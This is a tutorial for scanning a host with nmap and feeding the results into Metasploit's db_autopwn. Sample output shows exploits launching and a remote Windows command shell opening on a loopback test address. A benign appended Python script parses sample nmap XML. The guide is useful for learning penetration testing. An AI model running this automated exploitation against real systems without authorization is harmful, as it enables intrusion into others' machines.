Prerequisites
1) Install nmap: www.insecure.org
2) Install MySQL: www.mysql.org
a. Note: you can use other databases, such as SQLite or Postgres, if desired.
3) Install the Metasploit Framework: www.metasploit.com
4) Update the Metasploit Framework
a. Use the "Online Update" shortcut, or;
b. In the msf3 directory (%appdata%\msf3), run the command "svn update".
Attacking a host
1) Use nmap to scan a target, and output the results as XML for Metasploit
a. TCP: nmap -sV -p0-65535 host -oX host-tcp.xml
b. UDP: nmap -sU -sV -p0-65535 host -oX host-udp.xml
c. Note: You can use the Metasploit function db_nmap to directly import the results, but I prefer to keep an external copy on disk.
2) Start Metasploit
a. Load the database support:
msf > load db_mysql
[*] Successfully loaded plugin: db_mysql
b. Connect to the MySQL database:
msf > db_create <mysql-user>:<password>@localhost:<port>/<hostname>
[*] Database creation complete (check for errors)
c. Copy the nmap results into the Metasploit home directory:
copy host-tcp.xml %appdata%\msf3
copy host-udp.xml %appdata%\msf3
d. Import the nmap results into the database:
msf > db_import_nmap_xml host-tcp.xml
msf > db_import_nmap_xml host-udp.xml
e. Verify that the nmap import was successful:
msf > db_services
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=80 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=135 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1051 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1320 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1433 proto=tcp state=up name=ms-sql-s
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2301 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2381 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2853 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=3389 proto=tcp state=up name=microsoft-rdp
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=8080 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=9090 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=20001 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=56737 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=56738 proto=tcp state=up name=ssl
f. Now the fun part: let Metasploit throw everything it has at the target!
msf > db_autopwn -t -p -e
[*] Analysis completed in 11.8630001544952 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 127.1.2.3:135...
[*] Matched exploit/unix/webapp/php_xmlrpc_eval against 127.1.2.3:80...
[*] Launching exploit/unix/webapp/php_xmlrpc_eval (2/82) against 127.1.2.3:80...
[*] Started bind handler
[*] Matched exploit/windows/http/navicopa_get_overflow against 127.1.2.3:80...
[*] Launching exploit/windows/http/navicopa_get_overflow (3/82) against 127.1.2.3:80...
...
g. Wait for autopwn to complete, then check for any sessions:
msf> sessions -l -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 127.1.2.3:4444 -> 127.1.2.3:50671 windows/http/savant_31_overflow
h. With any luck you will have multiple shells. Interact with each by specifying the session number:
msf> sessions -i 1
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Windows\system32>
i. You can pause a session (Ctrl+Z) to come back to it later, or close the session (Ctrl+C) on the server.
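What the import in steps 2c to 2e actually does: it reads the host and port elements of each nmap XML report and stores one services row per confirmed-open port, which is the list db_services prints back. The script below is an added example, not part of this guide or of Metasploit's own importer; the two XML reports are constructed samples, and the decision to drop filtered and open|filtered ports is an assumption about how a sensible inventory should behave.

```python
import xml.etree.ElementTree as ET

# Constructed sample reports (not real scan output), trimmed to the host address and port elements.
SAMPLE_TCP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p0-65535 127.1.2.3 -oX host-tcp.xml">
 <host><address addr="127.1.2.3" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
  <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
  <port protocol="tcp" portid="23"><state state="filtered"/><service name="telnet"/></port>
 </ports></host>
</nmaprun>"""
SAMPLE_UDP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sU -sV -p0-65535 127.1.2.3 -oX host-udp.xml">
 <host><address addr="127.1.2.3" addrtype="ipv4"/><ports>
  <port protocol="udp" portid="137"><state state="open"/><service name="netbios-ns"/></port>
  <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
 </ports></host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Return (host, port, proto, name) for every port nmap confirmed open.
    filtered / open|filtered ports are dropped: nothing answered, so they get
    no services row (db_services lists the imported rows with state=up)."""
    services = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:  # no IPv4 address recorded for this host: skip it
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            services.append((addr_el.get("addr"), int(port.get("portid")),
                             port.get("protocol"), name))
    return services

def merge_scans(*xml_texts):
    """Combine several reports (the TCP and UDP runs) into one sorted, deduplicated list."""
    return sorted({s for x in xml_texts for s in parse_nmap_xml(x)})

def format_service(rec):
    """Render one record in the key=value layout db_services prints."""
    return "host={} port={} proto={} state=up name={}".format(*rec)

if __name__ == "__main__":
    for rec in merge_scans(SAMPLE_TCP_XML, SAMPLE_UDP_XML):
        print(format_service(rec))
```

Importing the same report twice yields no duplicate rows, which matches the behaviour you want when re-running the TCP and UDP scans against the same host.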